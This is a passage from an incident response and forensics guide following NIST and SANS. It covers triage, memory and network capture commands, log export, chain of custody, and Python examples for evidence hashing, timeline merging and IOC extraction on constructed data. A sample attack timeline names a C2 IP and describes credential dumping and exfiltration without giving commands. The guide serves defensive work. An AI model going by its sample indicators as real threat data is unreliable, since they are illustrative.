
Incident Response & Forensics Investigation Workflow: NIST & SANS Framework Guide

Learn the complete incident response workflow following NIST SP 800-61r3 and SANS 6-step methodology. From preparation to post-incident analysis, this guide covers evidence preservation, forensic collection, threat intelligence, and compliance reporting.

By InventiveHQ Security Team

Introduction

At 3:47 AM, your SIEM alerts fire. Unusual PowerShell execution on a domain controller. Lateral movement indicators. Possible data exfiltration. Your incident response plan just went from theoretical document to operational playbook. The decisions you make in the next few minutes will determine whether this becomes a minor security event or a company-defining breach.

According to the IBM Cost of a Data Breach Report 2024, organizations that contain a breach in less than 200 days save an average of $1.12 million compared to those that take longer. The difference between effective and ineffective incident response isn't just measured in dollars—it's measured in customer trust, regulatory penalties, and business continuity.

This comprehensive guide walks you through the complete Incident Response and Digital Forensics Investigation (DFIR) workflow, aligning with both the NIST SP 800-61r3 Computer Security Incident Handling Guide and the SANS Incident Handler's Handbook. Whether you're a SOC analyst responding to your first alert or a seasoned incident responder hunting advanced persistent threats, this workflow provides a systematic approach to detection, investigation, containment, and recovery.

The Incident Response Lifecycle

The NIST incident response lifecycle consists of four major phases, while SANS uses a six-step model. We've synthesized both into a comprehensive seven-stage workflow:

  1. Preparation & Readiness - Build your IR capability before incidents occur
  2. Detection & Initial Analysis - Identify and triage security events
  3. Evidence Preservation & Forensic Collection - Preserve chain of custody
  4. Deep Investigation & Threat Analysis - Understand attack scope and attribution
  5. Containment & Eradication - Stop the bleeding and remove the threat
  6. Recovery & Restoration - Return to normal operations safely
  7. Post-Incident Activity & Lessons Learned - Improve future response

According to Mandiant's M-Trends 2024, the global median dwell time (time between compromise and detection) was 10 days in 2023. Organizations with mature incident response programs detected intrusions in 5 days versus 31 days for those without formal programs. This guide will help you build that maturity.

Let's begin with the foundation: preparation.


Stage 1: Preparation & Readiness (Continuous, Before Incidents)

According to the PDQ incident response lifecycle guide, 80% of incident response effectiveness is determined by preparation activities conducted before the incident occurs. This stage is not a one-time project—it's a continuous program that evolves with your threat landscape.

Step 1.1: Develop Incident Response Plan & Playbooks

Goal: Create documented procedures for common incident scenarios.

Effective incident response requires customized playbooks for each major threat scenario your organization faces. Use the Incident Response Playbook Generator to create playbooks addressing ransomware attacks, data breaches and exfiltration, DDoS attacks, insider threats, Business Email Compromise (BEC), supply chain attacks, and cloud security incidents. Each playbook should document escalation paths and decision trees that guide responders through critical choices. Define incident severity levels (P1 through P4) with corresponding response SLAs that set clear expectations for response timelines. Include compliance notification requirements for each jurisdiction—GDPR requires notification within 72 hours, HIPAA allows 60 days, and SEC mandates disclosure within 4 business days for material incidents.

Playbook Components:

1. Incident Type & Indicators
2. Initial Triage Steps (15 minutes)
3. Escalation Criteria & Contact List
4. Investigation Procedures
5. Containment Options (Network isolation, account suspension, system shutdown)
6. Evidence Preservation Requirements
7. Communication Templates (Internal, customer, regulatory)
8. Recovery Procedures
9. Post-Incident Review Checklist

Tool Features:

  • Template-based playbook generation for 7+ incident types
  • Compliance mapping (GDPR, HIPAA, PCI-DSS, SOC 2, ISO 27001)
  • Team role assignments (Incident Commander, Lead Investigator, Communications Lead)
  • Export to PDF/Markdown for easy distribution

Step 1.2: Build Incident Response Team & Define Roles

Core IR Team Roles:

| Role | Responsibilities | Skills Required |
|---|---|---|
| Incident Commander | Overall coordination, decision authority, stakeholder communication | Leadership, risk assessment, business context |
| Lead Investigator | Technical investigation, forensics, root cause analysis | Digital forensics, malware analysis, threat hunting |
| Security Analyst | Log analysis, alert triage, IOC extraction | SIEM, EDR, threat intelligence |
| Systems Administrator | System isolation, credential rotation, patch deployment | Windows/Linux administration, Active Directory |
| Communications Lead | Internal updates, customer notifications, regulatory reporting | Crisis communications, compliance |
| Legal Counsel | Regulatory obligations, law enforcement coordination, litigation hold | Cyber law, privacy regulations |

Best Practice: Conduct quarterly tabletop exercises using your Incident Response Playbook Generator scenarios to test team coordination.

Step 1.3: Deploy Technical Capabilities

Detection and monitoring capabilities form the foundation of incident detection. SIEM platforms like Splunk, Elastic, or Microsoft Sentinel provide centralized log aggregation across the environment. EDR solutions such as CrowdStrike, SentinelOne, or Microsoft Defender deliver endpoint telemetry that reveals process execution, file operations, and network connections. NDR platforms like Darktrace, Vectra, or ExtraHop analyze network behavior to detect lateral movement and data exfiltration. Threat intelligence feeds consolidated through the Threat Intelligence Feed Aggregator enable correlation of observed indicators against known campaigns.

Forensic collection tools enable evidence preservation when incidents occur. FTK Imager supports disk imaging and memory acquisition with proper hash verification. KAPE (Kroll Artifact Parser and Extractor) enables rapid triage collection of critical artifacts in time-sensitive situations. Velociraptor provides distributed endpoint forensics capability at scale for enterprise environments. Wireshark and tcpdump capture network traffic for protocol analysis and C2 communication identification.

Analysis tools transform collected evidence into actionable intelligence. Volatility provides a comprehensive memory forensics framework for analyzing RAM captures. Autopsy offers an open-source digital forensics platform for disk analysis. X-Ways Forensics delivers commercial-grade forensic analysis capabilities for complex investigations.

Step 1.4: Establish Baseline & Asset Inventory

Why: You cannot detect anomalies without knowing what "normal" looks like.

Critical baselines define normal behavior patterns for comparison during investigations. Document network traffic patterns using DNS Lookup to record legitimate DNS queries and typical communication flows. Establish user behavior baselines capturing typical login times, locations, and systems accessed. Record system process baselines with known-good process hashes and expected parent-child relationships. Document external services including all cloud services and third-party integrations your organization uses.

Asset inventory provides essential context during incident response. Maintain a current list of all systems with criticality ratings that guide prioritization during incidents. Document data flows and trust boundaries to understand how compromise of one system affects others. Map Active Directory structure and privileged accounts to identify high-value targets. Identify crown jewels including customer databases, intellectual property repositories, and financial systems that require priority protection.

Evidence handling procedures ensure forensic evidence remains admissible in legal proceedings. Prepare chain of custody documentation templates that record who accessed evidence and when. Establish legal hold procedures for litigation that prevent evidence destruction when legal action is anticipated. Develop data retention policies aligned with regulatory requirements for different data types. Implement attorney-client privilege protections for IR communications to shield sensitive investigative details.

Regulatory notification templates accelerate compliance when breaches occur. GDPR requires breach notification within 72 hours of discovery for EU residents' data. HIPAA mandates breach reporting within 60 days for protected health information. PCI-DSS requires incident reporting for payment card data compromises. SEC rules require cybersecurity disclosure via Form 8-K within 4 business days for material incidents affecting publicly traded companies.

Cyber insurance review ensures coverage applies when incidents occur. Verify IR firm pre-approval requirements to avoid coverage disputes when engaging incident response contractors. Understand coverage limits and exclusions that might leave gaps during major incidents. Document required notification timelines that trigger coverage and avoid policy violations.

Key Deliverable: IR Readiness Assessment

Maturity Indicators:

  • Written IR plan reviewed in last 12 months
  • Playbooks for top 5 threat scenarios
  • IR team identified with 24/7 on-call rotation
  • Quarterly tabletop exercises conducted
  • Technical tools deployed and tested
  • Legal counsel and PR firm on retainer
  • Forensic retainer with incident response firm

Stage 2: Detection & Initial Analysis (15-60 minutes)

The DFIR process emphasizes that rapid detection and accurate triage are critical to minimizing dwell time. This stage transforms security alerts into actionable incident intelligence.

Step 2.1: Alert Triage & Validation

Goal: Determine if a security alert represents a genuine security incident.

Common alert sources trigger the initial investigation. SIEM correlation rules detect patterns like failed logins, privilege escalation attempts, and data exfiltration indicators across multiple log sources. EDR behavioral detections identify suspicious PowerShell execution, process injection techniques, and credential dumping tools. IDS/IPS signatures catch exploit attempts and known malware communication patterns. Threat intelligence feeds alert when systems communicate with known C2 servers or malicious infrastructure. User reports of phishing emails or suspicious system behavior often provide the first indication of compromise that automated systems miss.

Validation Checklist:

1. Is this a true positive or false positive?
2. What is the affected asset? (Workstation, server, cloud service)
3. What is the asset's criticality? (Business impact if compromised)
4. What is the event timeline? (First occurrence, frequency, duration)
5. Are there related alerts? (Lateral movement, privilege escalation)
6. Is this part of an active campaign? (Check threat intel feeds)

Tools:

Step 2.2: Incident Categorization & Severity Assessment

NIST Incident Categories:

  1. Category 1: Unauthorized Access - Account compromise, privilege escalation
  2. Category 2: Denial of Service - DDoS, resource exhaustion
  3. Category 3: Malicious Code - Malware, ransomware, worms
  4. Category 4: Improper Usage - Policy violations, insider threats
  5. Category 5: Information Disclosure - Data breaches, exfiltration
  6. Category 6: Multiple Categories - APT campaigns, ransomware with exfiltration

Severity Levels:

| Level | Criteria | Response Time | Example |
|---|---|---|---|
| P1 - Critical | Active data exfiltration, ransomware encryption, critical system compromise | 15 minutes | Domain controller compromised, ransomware spreading |
| P2 - High | Confirmed breach of non-critical system, malware detected but contained | 1 hour | User endpoint infected with banking trojan |
| P3 - Medium | Suspected compromise requiring investigation, failed attack attempt | 4 hours | Phishing email delivered but not clicked |
| P4 - Low | Policy violation, informational alert | 24 hours | Password policy violation, suspicious but benign activity |

Decision Point: P1/P2 incidents require immediate escalation to Incident Commander.

Step 2.3: Initial Scoping & Impact Assessment

Scoping questions guide the initial assessment of incident breadth and severity. Determine how many hosts and accounts have been compromised to understand the scale of the incident. Assess what sensitive data is accessible from compromised systems to evaluate potential data breach implications. Identify what level of access the attacker achieved—user-level access is less severe than administrator or domain administrator access. Look for evidence of lateral movement indicating spread to additional systems. Check for signs of persistence mechanisms like backdoors or scheduled tasks that would allow the attacker to maintain access.

Quick scoping tools accelerate the initial assessment. Use DNS Lookup to check for DNS tunneling or C2 communication patterns. Analyze phishing emails with Email Header Analyzer to determine source attribution and delivery path. Cross-reference discovered IOCs against known campaigns using the Threat Intelligence Feed Aggregator to determine if the incident matches a known threat actor or campaign.

Example Initial Assessment:

**Incident:** Suspicious PowerShell execution on DESKTOP-01
**Severity:** P2 (High)
**Category:** Malicious Code (Suspected)
**Scope:** Single endpoint, standard user account
**Impact:** Limited - no privileged access detected
**Next Actions:** Isolate system, collect forensic evidence, analyze PowerShell script

Step 2.4: Activate Incident Response Plan

Activation criteria determine when formal incident response procedures engage. Activate the IR plan when a confirmed or highly likely security incident has been identified, when severity reaches P1 or P2 level, or when potential exists for business impact or regulatory notification requirements.

Immediate actions upon activation follow a consistent pattern. Notify the Incident Commander and escalate per the playbook procedures. Assemble the IR team by paging on-call analysts and required specialists. Create a war room using a dedicated Slack or Teams channel for coordination. Start documentation immediately, recording the incident timeline, affected systems, and all actions taken. Preserve evidence by preventing log rotation, creating VM snapshots, and capturing memory before it changes.

Communication Template:

TO: IR Team
SUBJECT: [P2] Incident #2025-001 - Suspected Malware on DESKTOP-01

**Summary:** EDR detected suspicious PowerShell execution attempting to download
external payload. User reports system slowness.

**Status:** Investigation in progress
**Affected Systems:** DESKTOP-01 (Finance Department)
**IR Commander:** Jane Smith
**War Room:** #incident-2025-001

**Immediate Actions Required:**
- Lead Investigator: Collect forensic image
- Sysadmin: Isolate system from network (preserve for forensics)
- Analyst: Extract IOCs and check for lateral movement

Step 2.5: Initial Containment Decision

Short-Term Containment Options:

| Action | When to Use | Risk |
|---|---|---|
| Network Isolation | Active malware spread, C2 communication | May alert attacker, prevents forensic network capture |
| Account Suspension | Compromised credentials | May disrupt legitimate business if wrong account |
| System Shutdown | Active ransomware encryption | Destroys volatile memory evidence |
| Monitor Only | Advanced attacker, need to gather intelligence | Allows continued malicious activity |

Best Practice: For P1 incidents, bias toward containment. For P2/P3, consider monitored containment to gather additional intelligence about attacker TTPs.

Key Deliverable: Incident Declaration & Initial Report

Required Information:

  • Incident ID and severity level
  • Affected systems and user accounts
  • Initial timeline of events
  • Working theory of attack vector
  • Containment actions taken
  • IR team assignments

Stage 3: Evidence Preservation & Forensic Collection (1-3 hours)

The SANS DFIR framework emphasizes that evidence preservation must balance forensic soundness with incident response speed. This stage ensures that evidence collected will withstand legal scrutiny while enabling rapid investigation.

Step 3.1: Forensic Triage Collection

Order of Volatility (Collect in this order):

1. CPU registers, cache (seconds)
2. RAM memory (minutes)
3. Network connections, ARP cache (minutes)
4. Running processes (minutes)
5. Disk (hours to days)
6. Logs, backups (days to weeks)

Quick triage tools enable rapid evidence collection. KAPE (Kroll Artifact Parser and Extractor) automates artifact collection from Windows systems, gathering critical forensic artifacts in minutes rather than hours. FTK Imager handles memory capture and logical disk imaging with proper hash verification for chain of custody. Velociraptor provides remote collection capabilities for distributed environments, enabling forensic triage across multiple endpoints simultaneously.

Memory Capture:

```
# Windows (using FTK Imager or DumpIt)
DumpIt.exe /O C:\ForensicImages\DESKTOP-01_memory.mem

# Linux (using LiME - Linux Memory Extractor)
insmod lime.ko "path=/tmp/memory.lime format=lime"

# Capture network connections before memory acquisition (Windows; -b requires an elevated prompt)
netstat -anob > network_connections.txt
arp -a > arp_cache.txt
```

Critical Windows artifacts reveal execution history and attacker activity. Prefetch files in C:\Windows\Prefetch\ record program execution history including timestamps. Shimcache stores application compatibility cache data in the registry showing executed programs. AmCache tracks application execution and installation details. Event Logs (Security, System, Application) contain authentication events, process creation, and system changes. The MFT (Master File Table) records file creation, modification, and access times. The USN Journal maintains a file system change log capturing file operations. Browser History may reveal C2 infrastructure communication or credential harvesting attempts.

Critical Linux artifacts provide similar investigative value on Unix systems. Auth logs at /var/log/auth.log record SSH sessions and sudo usage. Bash history files (.bash_history) preserve command history for each user. Cron jobs in /etc/crontab and /var/spool/cron/ may contain persistence mechanisms. System logs at /var/log/syslog capture general system activity. Network configuration files (/etc/hosts, /etc/resolv.conf) may show evidence of DNS poisoning or redirection.

Step 3.2: Network Traffic Capture

Why: Network packet captures (PCAPs) reveal C2 communication, data exfiltration, and lateral movement that may not be logged elsewhere.

Capture points determine where to collect network traffic. Endpoint capture using Wireshark on the affected system provides the most detailed view if the system remains accessible. Network TAPs provide inline capture for sensitive network segments without affecting traffic flow. Span or mirror ports on switches can redirect copies of traffic to dedicated capture hosts. Cloud VPC Flow Logs from AWS VPC or Azure NSG provide network flow data for cloud-based incidents.

Capture Tools:

```bash
# Wireshark (GUI) or tcpdump (CLI)
tcpdump -i eth0 -w incident_2025-001.pcap

# Capture specific traffic patterns
tcpdump -i eth0 'host 192.168.1.100 or port 443' -w filtered.pcap

# Zeek (formerly Bro) for protocol analysis
zeek -i eth0 local "Site::local_nets += { 192.168.0.0/16 }"
```

Analysis targets focus network investigation on suspicious patterns. Look for DNS queries to newly registered domains that may indicate C2 infrastructure. Identify encrypted traffic to non-standard ports that might bypass security controls. Detect large outbound data transfers that could represent exfiltration. Watch for beaconing behavior with regular intervals that suggests automated C2 communication.

Tools support network traffic analysis and IOC correlation. Use IOC Extractor to extract IP addresses and domains from PCAP analysis results. Validate extracted IPs against threat intelligence with IP Risk Checker to identify known malicious infrastructure. Investigate SSL certificates from HTTPS traffic using Certificate Transparency Lookup to identify suspicious or newly issued certificates.

Step 3.3: Log Collection & Preservation

Goal: Gather logs before rotation or deletion.

Critical Log Sources:

| Log Source | Retention | Investigation Value |
|---|---|---|
| SIEM | 90+ days | Correlation across systems |
| EDR | 30-90 days | Process execution, file operations, network |
| Firewall | 30 days | Inbound/outbound connections |
| Proxy | 30 days | Web traffic, downloads |
| AD Logs | 30-90 days | Authentication, privilege changes |
| Cloud Logs | 90+ days | API calls, resource modifications |
| Application Logs | Varies | App-specific activity |

Collection Commands:

```powershell
# Windows Event Logs (PowerShell)
Get-WinEvent -FilterHashtable @{
  LogName='Security','System','Application'
  StartTime=(Get-Date).AddDays(-7)
} | Export-Csv security_logs.csv

# Export specific Event IDs (e.g., 4624 - Account logon)
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4624,4625,4672}
```

```bash
# Linux syslog collection
journalctl --since "2025-01-07 00:00:00" --until "2025-01-07 23:59:59" > syslog_jan7.txt

# Extract authentication attempts
grep -i "authentication\|failed\|success" /var/log/auth.log
```

Cloud Platform Logs:

  • AWS CloudTrail - API activity across all AWS services
  • Azure Activity Logs - Subscription-level events
  • GCP Cloud Audit Logs - Admin activity, data access, system events
  • Office 365 Unified Audit Log - Email, SharePoint, Teams activity

Step 3.4: Chain of Custody Documentation

Why: Evidence may be used in criminal prosecution, civil litigation, or regulatory proceedings. Proper chain of custody ensures admissibility.

Required Documentation:

**Evidence Item:** DESKTOP-01 Memory Capture
**Evidence ID:** IR-2025-001-MEM-01
**Collected By:** John Doe, Lead Investigator
**Collection Date/Time:** 2025-01-07 14:35:00 UTC
**Collection Method:** FTK Imager v4.5
**Hash (SHA-256):** a1b2c3d4e5f6...
**Storage Location:** Forensic Server \\FORENSIC01\Evidence\2025-001\
**Access Log:**
  - 2025-01-07 14:35 - John Doe - Initial collection
  - 2025-01-07 15:20 - Jane Smith - Analysis begins

Hash verification ensures evidence integrity throughout the investigation. Use Hash Generator to compute MD5, SHA-256, and SHA-512 hashes at the time of collection. Verify hash integrity before and after analysis to confirm evidence remains unmodified. Document any hash mismatches immediately as they may indicate evidence tampering.
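The verify-before-and-after discipline in Step 3.4 is easy to state and easy to skip under time pressure, so it is worth scripting. The following is an added example (not the page's code or any vendor tool): it streams an evidence file through MD5, SHA-256 and SHA-512 at collection time, keeps an append-only access log in the shape of the chain-of-custody template above, and re-hashes on every access so that a mismatch is recorded rather than noticed weeks later. The evidence file, evidence ID, names and tool version in `demo()` are constructed sample values.

```python
"""Evidence hashing and chain-of-custody record (added example, not the page's code)."""
import hashlib
import io
import json
import os
import tempfile
from datetime import datetime, timezone

HASH_ALGOS = ("md5", "sha256", "sha512")


def hash_stream(fh, algos=HASH_ALGOS, chunk_size=1 << 20):
    """Feed a file object through every digest in one pass; streaming keeps multi-GB images out of RAM."""
    digests = {name: hashlib.new(name) for name in algos}
    for chunk in iter(lambda: fh.read(chunk_size), b""):
        for d in digests.values():
            d.update(chunk)
    return {name: d.hexdigest() for name, d in digests.items()}


def hash_file(path, algos=HASH_ALGOS):
    with open(path, "rb") as fh:
        return hash_stream(fh, algos)


def hash_bytes(data, algos=HASH_ALGOS):
    return hash_stream(io.BytesIO(data), algos)


class CustodyRecord:
    """One evidence item: identity, baseline hashes, and who touched it when."""

    def __init__(self, evidence_id, description, path, collected_by, method):
        self.evidence_id = evidence_id
        self.description = description
        self.path = path
        self.method = method
        self.hashes = hash_file(path)          # baseline digests taken at collection time
        self.access_log = []
        self.log(collected_by, "Initial collection")

    def log(self, who, action):
        stamp = datetime.now(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
        self.access_log.append({"time": stamp, "who": who, "action": action})

    def verify(self, who, stage):
        """Re-hash the file and log the outcome; True only if every baseline digest still matches."""
        ok = hash_file(self.path) == self.hashes
        outcome = "hash verified" if ok else "HASH MISMATCH - evidence may have been altered"
        self.log(who, f"{stage}: {outcome}")
        return ok

    def to_json(self):
        """Chain-of-custody form with the same fields as the template above."""
        return json.dumps({
            "evidence_id": self.evidence_id,
            "description": self.description,
            "collection_method": self.method,
            "storage_location": self.path,
            "hashes": self.hashes,
            "access_log": self.access_log,
        }, indent=2)


def demo():
    """Constructed walkthrough: a clean verification, then one after an accidental write to the image."""
    with tempfile.TemporaryDirectory() as tmp:
        mem = os.path.join(tmp, "DESKTOP-01_memory.mem")
        with open(mem, "wb") as fh:
            fh.write(b"CONSTRUCTED MEMORY IMAGE\x00" * 4096)   # stand-in for a real capture
        rec = CustodyRecord("IR-2025-001-MEM-01", "DESKTOP-01 Memory Capture", mem,
                            "John Doe, Lead Investigator", "DumpIt (version hypothetical)")
        before = rec.verify("Jane Smith", "Analysis begins")
        with open(mem, "ab") as fh:             # someone appends to the evidence file by mistake
            fh.write(b"\x00")
        after = rec.verify("Jane Smith", "Analysis complete")
        return before, after, rec


if __name__ == "__main__":
    before, after, rec = demo()
    print(rec.to_json())
```

Point analysis tools at a working copy and keep the original read-only; the second `verify` in `demo()` shows what the log looks like when that rule is broken.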

Step 3.5: Evidence Storage & Access Control

Storage requirements protect evidence integrity and confidentiality. Implement AES-256 encryption for data at rest to prevent unauthorized access. Apply role-based access controls limiting access to IR team members only. Align retention periods with legal hold requirements and compliance obligations. Maintain redundant backup copies in separate locations to prevent evidence loss. Enable audit logging to track all access to evidence for chain of custody documentation.

Evidence types collected during forensic investigations include disk images providing bit-for-bit copies of hard drives, memory dumps capturing RAM contents at a point in time, network traffic in PCAP format, logs from system, application, and network sources, malware samples stored in password-protected archives to prevent accidental execution, and documentation including screenshots, timelines, and analysis reports.

Key Deliverable: Forensic Evidence Package

The forensic evidence package should contain complete forensic images with hash verification, memory dumps from affected systems, network packet captures covering the incident timeframe, relevant log files from security, system, and application sources, chain of custody forms documenting evidence handling, and collection methodology documentation describing the tools and procedures used.


Stage 4: Deep Investigation & Threat Analysis (2-8 hours)

According to Mandiant's attack lifecycle research, understanding attacker tactics, techniques, and procedures (TTPs) is essential for both containment and preventing reinfection. This stage transforms raw forensic data into threat intelligence.

Step 4.1: Timeline Analysis & Event Reconstruction

Goal: Build a comprehensive timeline from initial compromise to detection.

Key questions guide the reconstruction of the attack sequence. Determine how the attacker gained initial access—through phishing, exploitation of vulnerabilities, or stolen credentials. Identify what malware or scripts were executed on compromised systems. Understand how the attacker maintained persistence through scheduled tasks, registry keys, or services. Analyze how the attacker escalated privileges from initial access to higher permissions. Map which other systems were accessed through lateral movement. Assess whether data was stolen, quantify how much was taken, and identify where the exfiltrated data was sent.

Timeline Sources:

**Windows:**
- Prefetch files ($MFT timestamps)
- Event Logs (4624, 4625, 4672, 4688, 4698, 4699, 4700, 4701, 4702, 7045)
- Registry modification times
- Browser history
- Shimcache/AmCache
- USN Journal

**Linux:**
- bash_history
- auth.log (SSH, sudo)
- syslog
- File access/modification times
- cron logs

**Network:**
- Firewall logs
- Proxy logs
- DNS logs
- NetFlow/IPFIX data

Timeline Example:

```
2025-01-06 18:32:14 - User opened phishing email attachment "Invoice.pdf.exe"
2025-01-06 18:32:18 - Invoice.pdf.exe executed (PID 4532)
2025-01-06 18:32:22 - Outbound connection to 185.220.101.45:443 (C2 server)
2025-01-06 18:35:00 - PowerShell launched with encoded command (credential dumping)
2025-01-06 18:37:12 - Lateral movement to FILE-SERVER-01 via SMB
2025-01-06 19:15:00 - Data staged in C:\Windows\Temp\backup.zip (15GB)
2025-01-06 19:45:00 - Outbound data transfer to file-sharing service
2025-01-07 03:47:00 - EDR alert triggers on PowerShell execution
```
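The hard part of a timeline like the one above is not the sorting but the normalisation: every source stamps time differently, and a Windows export in local time next to a syslog line with no year or zone will put events in the wrong order. The following is an added example (not the page's code) that merges three constructed sources into one UTC-ordered timeline and measures the gap from the first attacker action to the detection alert. The export formats, hosts and IPs are constructed; the syslog year and zone (2025, UTC) are assumptions the parser takes as parameters, because a real investigation must confirm them from the host's configuration.

```python
"""Super-timeline builder across Windows, Linux and firewall sources (added example)."""
import re
from datetime import datetime, timezone

SYSLOG_RE = re.compile(r"^(\w{3})\s+(\d{1,2}) (\d\d:\d\d:\d\d) (\S+) (.*)$")


def parse_windows_csv(line):
    """'ISO-8601 with UTC offset,EventID,Computer,Message' (constructed export format)."""
    stamp, event_id, computer, message = line.split(",", 3)
    ts = datetime.fromisoformat(stamp).astimezone(timezone.utc)
    return {"ts": ts, "source": "windows", "host": computer,
            "event": f"EventID {event_id}: {message}"}


def parse_syslog(line, year=2025, tz=timezone.utc):
    """Classic syslog carries no year or zone; both are supplied by the caller (assumption)."""
    mon, day, clock, host, message = SYSLOG_RE.match(line).groups()
    ts = datetime.strptime(f"{year} {mon} {day} {clock}", "%Y %b %d %H:%M:%S").replace(tzinfo=tz)
    return {"ts": ts.astimezone(timezone.utc), "source": "linux", "host": host, "event": message}


def parse_firewall(line):
    """'epoch direction src dst dport action' (constructed firewall export)."""
    epoch, direction, src, dst, dport, action = line.split()
    ts = datetime.fromtimestamp(int(epoch), tz=timezone.utc)
    return {"ts": ts, "source": "firewall", "host": src,
            "event": f"{action} {direction} {src} -> {dst}:{dport}"}


def build_timeline(windows_lines, syslog_lines, firewall_lines):
    events = [parse_windows_csv(l) for l in windows_lines]
    events += [parse_syslog(l) for l in syslog_lines]
    events += [parse_firewall(l) for l in firewall_lines]
    return sorted(events, key=lambda e: e["ts"])   # stable sort: equal stamps keep source order


def time_to_detection(timeline, detection_marker="Alert:"):
    """Seconds from the earliest event to the first event whose text carries the marker."""
    first = timeline[0]["ts"]
    for e in timeline:
        if detection_marker in e["event"]:
            return int((e["ts"] - first).total_seconds())
    return None


def format_timeline(timeline):
    return [f"{e['ts']:%Y-%m-%d %H:%M:%S} UTC  {e['source']:<8} {e['host']:<15} {e['event']}"
            for e in timeline]


# Constructed sample input; times mirror the narrative timeline above, expressed per source.
WINDOWS = [
    "2025-01-06T13:32:18-05:00,4688,DESKTOP-01,New process Invoice.pdf.exe (PID 4532)",
    "2025-01-06T13:35:00-05:00,4104,DESKTOP-01,Script block with encoded command",
    "2025-01-06T22:47:00-05:00,EDR,DESKTOP-01,Alert: suspicious PowerShell execution",
]
SYSLOG = ["Jan  6 18:37:12 FILE-SERVER-01 smbd[2210]: connection from 10.0.0.15 as svc_backup"]
FIREWALL = ["1736188342 OUT 10.0.0.15 185.220.101.45 443 ALLOW"]

if __name__ == "__main__":
    tl = build_timeline(WINDOWS, SYSLOG, FIREWALL)
    print("\n".join(format_timeline(tl)))
    print("seconds from first action to detection:", time_to_detection(tl))
```

Run as-is it prints the five events in true order with the firewall's epoch stamp landing four seconds after the 4688 process creation, which is the ordering a naive sort on the raw strings would lose.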

Step 4.2: Malware Analysis & IOC Extraction

Static analysis examines malware without execution, providing safe initial assessment. Use Hash Generator to calculate file hashes and check against VirusTotal and MalwareBazaar for known malware identification. Apply File Magic Number Checker to detect extension spoofing where files like Invoice.pdf.exe masquerade as documents. Extract URLs, IPs, domain names, and API calls with String Extractor. Detect packing and obfuscation using Entropy Analyzer to identify encrypted or compressed payloads. Perform manual binary inspection with Hex Editor. Decode obfuscated scripts using Malware Deobfuscator. Handle encoded payloads with Base64 Encoder/Decoder and decrypt XOR-encoded data with XOR Cipher. Disassemble x86 and ARM binaries using Machine Code Disassembler for deeper code analysis.

Dynamic analysis executes malware in controlled sandbox environments to observe behavior. Any.Run provides interactive malware sandbox analysis with real-time observation. Hybrid Analysis offers free automated sandbox analysis with detailed reports. Joe Sandbox delivers commercial deep analysis for advanced threats. Cuckoo Sandbox provides self-hosted open-source sandbox capability for organizations requiring on-premises analysis.

IOC extraction identifies indicators that reveal attacker infrastructure and methods. Collect IP addresses of C2 servers and download locations. Record domain names used for C2 communication and phishing sites. Capture malware download URLs. Document file hashes (MD5, SHA-1, SHA-256) of all malware samples. Note registry keys used for persistence mechanisms. Identify mutex names that serve as malware infection markers. Extract email addresses used in phishing campaigns.

Tools for IOC management support extraction and sharing. Use IOC Extractor to automatically extract IOCs from text, memory dumps, and logs. Apply URL Defanger to defang IOCs for safe sharing in the format hxxp://example[.]com. Check C2 IP reputation and geolocation with IP Risk Checker. Cross-reference discovered IOCs against global threat feeds using Threat Intelligence Feed Aggregator.
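The IOC extraction and defanging steps described above are simple enough to script, and scripting them avoids the transcription errors that creep in when indicators are copied by hand from a sandbox report. The following is an added example (not the page's code or the IOC Extractor / URL Defanger tools it mentions): it pulls IPv4 addresses, URLs, domains, e-mail addresses and MD5/SHA-1/SHA-256 hashes out of free text, separates RFC 1918 addresses from external ones, and defangs in the `hxxp://example[.]com` style shown above. The sample report and every indicator in it are constructed; the short TLD list is an assumption to extend for real reports, and `[at]` for e-mail addresses is a common convention, not something the page specifies.

```python
"""IOC extraction and defanging over free text (added example, not the page's code)."""
import ipaddress
import re

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s'\"<>)]+", re.I)
# Deliberately short TLD list (assumption); extend for production use.
DOMAIN_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+(?:com|net|org|io|ru|xyz|top|info)\b", re.I)
EMAIL_RE = re.compile(r"\b[\w.+-]+@(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)
HASH_RE = re.compile(r"\b(?:[a-f0-9]{64}|[a-f0-9]{40}|[a-f0-9]{32})\b", re.I)
HASH_NAMES = {32: "md5", 40: "sha1", 64: "sha256"}


def _valid_ip(candidate):
    try:
        ipaddress.ip_address(candidate)
        return True
    except ValueError:          # e.g. 999.1.1.1 matched by the loose regex
        return False


def extract_iocs(text):
    """Return de-duplicated, sorted indicators grouped by type."""
    ips = {m for m in IPV4_RE.findall(text) if _valid_ip(m)}
    emails = set(EMAIL_RE.findall(text))
    # Drop the domain part of e-mail addresses so it is not reported twice.
    domains = {d.lower() for d in DOMAIN_RE.findall(text)
               if not any(e.lower().endswith("@" + d.lower()) for e in emails)}
    hashes = {}
    for h in HASH_RE.findall(text):
        hashes.setdefault(HASH_NAMES[len(h)], set()).add(h.lower())
    return {
        "external_ips": sorted(ip for ip in ips if not ipaddress.ip_address(ip).is_private),
        "internal_ips": sorted(ip for ip in ips if ipaddress.ip_address(ip).is_private),
        "urls": sorted(set(URL_RE.findall(text))),
        "domains": sorted(domains),
        "emails": sorted(emails),
        "hashes": {k: sorted(v) for k, v in hashes.items()},
    }


def defang(indicator):
    """hxxp://host[.]tld/path for URLs; dots bracketed in bare hosts and IPs; [at] in e-mails."""
    if "://" in indicator:
        scheme, rest = indicator.split("://", 1)
        host, sep, path = rest.partition("/")
        return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + sep + path
    return indicator.replace(".", "[.]").replace("@", "[at]")


def refang(indicator):
    """Inverse of defang, for feeding shared indicators back into tooling."""
    return indicator.replace("hxxp", "http").replace("[.]", ".").replace("[at]", "@")


SAMPLE_REPORT = """Constructed sandbox excerpt:
Invoice.pdf.exe (sha256 deadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef,
md5 cafebabecafebabecafebabecafebabe) requested http://update-check.example.com/gate.php
then held a TLS session to 185.220.101.45:443 and staged files on 10.0.0.15.
Original lure was sent by billing@invoice-portal.example.net."""

if __name__ == "__main__":
    iocs = extract_iocs(SAMPLE_REPORT)
    for kind, values in iocs.items():
        print(f"{kind}: {values}")
    print("defanged:", [defang(u) for u in iocs["urls"]], defang(iocs["external_ips"][0]))
```

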